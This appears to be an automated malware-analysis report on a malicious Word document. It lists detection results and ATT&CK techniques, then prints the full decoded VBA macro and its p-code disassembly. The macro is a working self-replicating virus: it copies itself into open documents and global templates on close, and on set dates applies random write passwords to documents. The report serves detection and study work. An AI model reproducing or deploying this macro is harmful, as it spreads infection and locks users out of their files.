MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the macros attempt to self-replicate by writing their code into other documents. This behavior is characteristic of macro-based malware designed for propagation. No specific family could be identified, but the replication mechanism is a key indicator of malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Title-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Title-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9226 bytes |
SHA-256: 0c649edc63425f8d90aac31eabebcfd5703ab0007a65f97d4b776d5a681a9836 |
|||
|
Detection
ClamAV:
Doc.Trojan.Title-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
If Left(Me.BuiltInDocumentProperties("Title"), 1) = "?" Then
Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
Exit Sub
End If
Me.BuiltInDocumentProperties("Title") = "?" & Me.BuiltInDocumentProperties("Title")
Dim currdoc As Document
Dim thecode As Object
Dim currcomp As Object
Set thecode = Me.VBProject.VBComponents.Item(Me.CodeName).CodeModule
Dim lines As Integer, mystart As Integer
mystart = thecode.ProcBodyLine("Document_Close", vbext_pk_Proc)
mylines = thecode.ProcCountLines("Document_Close", vbext_pk_Proc) - mystart + 1
Dim savy As Boolean
' Options.VirusProtection =
For Each currdoc In Documents
savy = currdoc.Saved
If currdoc.SaveFormat = wdFormatDocument Or currdoc.SaveFormat = wdFormatTemplate Then
Set currcomp = currdoc.VBProject.VBComponents.Item(1)
If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
Else
currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, thecode.lines(mystart + 1, mylines - 2)
End If
If savy Then currdoc.Save
End If
If (Day(Now()) = 30 And Month(Now()) = 7) Or (Day(Now()) = 20 And Month(Now()) = 6) Or (Day(Now()) = 3 And Month(Now()) = 5) Then
currdoc.WritePassword = Str(Int(Rnd() * 10) - 1)
If savy Then currdoc.Save
End If
End If
Next currdoc
Dim currtemp As Template
Dim code As String
For Each currtemp In Templates
savy = currtemp.Saved
Set currcomp = currtemp.VBProject.VBComponents.Item(1)
If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
code = thecode.lines(mystart, mylines)
currcomp.CodeModule.AddFromString code
Else
code = thecode.lines(mystart + 1, mylines - 2)
currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, code
End If
If savy Then currtemp.Save
End If
Next currtemp
Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
End Sub
' Processing file: /opt/analyzer/scan_staging/b36685d991c748b78c94c80c417b6216.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8729 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemLd BuiltInDocumentProperties 0x0001
' LitDI2 0x0001
' ArgsLd LBound 0x0002
' LitStr 0x0001 "?"
' Eq
' IfBlock
' Line #3:
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemLd BuiltInDocumentProperties 0x0001
' LitDI2 0x0002
' ArgsLd Mid$ 0x0002
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemSt BuiltInDocumentProperties 0x0001
' Line #4:
' ExitSub
' Line #5:
' EndIfBlock
' Line #6:
' LitStr 0x0001 "?"
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemLd BuiltInDocumentProperties 0x0001
' Concat
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemSt BuiltInDocumentProperties 0x0001
' Line #7:
' Dim
' VarDefn currdoc (As Document)
' Line #8:
' Dim
' VarDefn thecode (As Object)
' Line #9:
' Dim
' VarDefn currcomp (As Object)
' Line #10:
' SetStmt
' Ld id_FFFF
' MemLd CodeName
' Ld id_FFFF
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' Set thecode
' Line #11:
' Dim
' VarDefn lines (As Integer)
' VarDefn mystart (As Integer)
' Line #12:
' LitStr 0x000E "Document_Close"
' Ld vbext_pk_Proc
' Ld thecode
' ArgsMemLd ProcBodyLine 0x0002
' St mystart
' Line #13:
' LitStr 0x000E "Document_Close"
' Ld vbext_pk_Proc
' Ld thecode
' ArgsMemLd ProcCountLines 0x0002
' Ld mystart
' Sub
' LitDI2 0x0001
' Add
' St mylines
' Line #14:
' Dim
' VarDefn savy (As Boolean)
' Line #15:
' QuoteRem 0x0003 0x001A " Options.VirusProtection ="
' Line #16:
' StartForVariable
' Ld currdoc
' EndForVariable
' Ld Documents
' ForEach
' Line #17:
' Ld currdoc
' MemLd Saved
' St savy
' Line #18:
' Ld currdoc
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld currdoc
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' IfBlock
' Line #19:
' SetStmt
' LitDI2 0x0001
' Ld currdoc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set currcomp
' Line #20:
' LitStr 0x0009 "wsxzaqedc"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x86A0 0x0001
' LitDI4 0x86A0 0x0001
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' Not
' IfBlock
' Line #21:
' LitStr 0x000E "Document_Close"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x86A0 0x0001
' LitDI4 0x86A0 0x0001
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' Not
' IfBlock
' Line #22:
' Ld mystart
' Ld mylines
' Ld thecode
' ArgsMemLd lines 0x0002
' Ld currcomp
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #23:
' ElseBlock
' Line #24:
' LitStr 0x000E "Document_Close"
' Ld vbext_pk_Proc
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd ProcBodyLine 0x0002
' LitDI2 0x0001
' Add
' Ld mystart
' LitDI2 0x0001
' Add
' Ld mylines
' LitDI2 0x0002
' Sub
' Ld thecode
' ArgsMemLd lines 0x0002
' Ld currcomp
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #25:
' EndIfBlock
' Line #26:
' Ld savy
' If
' BoSImplicit
' Ld currdoc
' ArgsMemCall Save 0x0000
' EndIf
' Line #27:
' EndIfBlock
' Line #28:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x001E
' Eq
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0007
' Eq
' And
' Paren
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0014
' Eq
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0006
' Eq
' And
' Paren
' Or
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0003
' Eq
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0005
' Eq
' And
' Paren
' Or
' IfBlock
' Line #29:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' LitDI2 0x0001
' Sub
' ArgsLd Str 0x0001
' Ld currdoc
' MemSt WritePassword
' Line #30:
' Ld savy
' If
' BoSImplicit
' Ld currdoc
' ArgsMemCall Save 0x0000
' EndIf
' Line #31:
' EndIfBlock
' Line #32:
' Line #33:
' EndIfBlock
' Line #34:
' StartForVariable
' Ld currdoc
' EndForVariable
' NextVar
' Line #35:
' Dim
' VarDefn currtemp (As Template)
' Line #36:
' Dim
' VarDefn code (As String)
' Line #37:
' StartForVariable
' Ld currtemp
' EndForVariable
' Ld Templates
' ForEach
' Line #38:
' Ld currtemp
' MemLd Saved
' St savy
' Line #39:
' SetStmt
' LitDI2 0x0001
' Ld currtemp
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set currcomp
' Line #40:
' LitStr 0x0009 "wsxzaqedc"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x86A0 0x0001
' LitDI4 0x86A0 0x0001
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' Not
' IfBlock
' Line #41:
' LitStr 0x000E "Document_Close"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x86A0 0x0001
' LitDI4 0x86A0 0x0001
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' Not
' IfBlock
' Line #42:
' Ld mystart
' Ld mylines
' Ld thecode
' ArgsMemLd lines 0x0002
' St code
' Line #43:
' Ld code
' Ld currcomp
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #44:
' ElseBlock
' Line #45:
' Ld mystart
' LitDI2 0x0001
' Add
' Ld mylines
' LitDI2 0x0002
' Sub
' Ld thecode
' ArgsMemLd lines 0x0002
' St code
' Line #46:
' LitStr 0x000E "Document_Close"
' Ld vbext_pk_Proc
' Ld currcomp
' MemLd CodeModule
' ArgsMemLd ProcBodyLine 0x0002
' LitDI2 0x0001
' Add
' Ld code
' Ld currcomp
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #47:
' EndIfBlock
' Line #48:
' Ld savy
' If
' BoSImplicit
' Ld currtemp
' ArgsMemCall Save 0x0000
' EndIf
' Line #49:
' EndIfBlock
' Line #50:
' StartForVariable
' Ld currtemp
' EndForVariable
' NextVar
' Line #51:
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemLd BuiltInDocumentProperties 0x0001
' LitDI2 0x0002
' ArgsLd Mid$ 0x0002
' LitStr 0x0005 "Title"
' Ld id_FFFF
' ArgsMemSt BuiltInDocumentProperties 0x0001
' Line #52:
' EndSub
' Line #53:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.